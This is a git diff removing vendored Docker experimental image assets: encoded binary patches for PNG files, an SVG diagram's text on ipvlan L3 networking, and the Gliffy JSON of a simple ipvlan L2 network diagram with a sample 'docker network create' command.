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,thephysicalnetworkdoesnothavearoutetotheirsubnetsWhohas10.16.20.0/24?Whohas10.1.20.0/24?ContainerscanbeondifferentsubnetsandreacheachotherIpvlanL3ModeEth0192.168.50.10/24ParentinterfaceactsasaRouterAllcontainerscanpingeachotherarouterifwithouttheysharetheparentinterface (sameexampleeth0)Container(s)Eth010.1.20.x/24Container(s)Eth0172.16.20.x/24PhysicalNetwork \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy deleted file mode 100644 index 41b0475dfa..0000000000 
--- a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy
.shape.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 192.168.1.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router

192.168.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x
":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text",
"order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340
882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2

192.168.1.3/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

pub_net (eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

docker network create -d ipvlan \\

    --subnet=192.168.1.0/24 \\

    --gateway=192.168.1.1 \\

    -o parent=eth0 pub_net

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png deleted file mode 100644 index e489a446ddd255ce9360445f0f895acad31ae214..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20145 zcmcF}Wm_BX)-MEt1b26e7k77e*Wy;ZSn&jRC|X>LyHhNz@S ze8i0cV6p4QB~YT4VUhO25)Fd;Y4*1#ZpvVXQxpL@g=es)ECJoB_ zyXF_<{ZZ+Qd~qMX23VTO0}Ci$EJ^VH|K+bA>SiF`)Q`u6!a+qr=091`>~XaCToMYq z%#PZ)GO53SJ}8O9N}r9aMcoYQQM|NynYTCxUG1+$oqx-fFj)QU^!q?7qhN(_vcsMC~IKT z)i*HpeMViZn9ole+tgKap0V#v_U+Fc?`5d5fT!ue0mC!l_V&Quf=75Qy*au+MC7l- zeCh8?un+IInI*_z|7wZv5M{;bNI>`**5&%Eq!%q41!ycdM7^OH0GJf z#?QYSMbkM*`&<<-gdC^9X2vA8C(zKOe-NE(1VgZ#JZJHk3m!Y(6RbSS8hww*G5t`t zSz6qUA{66ryN~oW1Yk&=qIz5u1wRcy@S@AmY|BSPjXc*BJL9{2X~VRI07TaD;6-ut zO0EEWC8%$xX;5lmLA}upP)&ZthyU*FAaF+2&rpG)o9xT_1osxTGeRG+9>^thtqc?{ 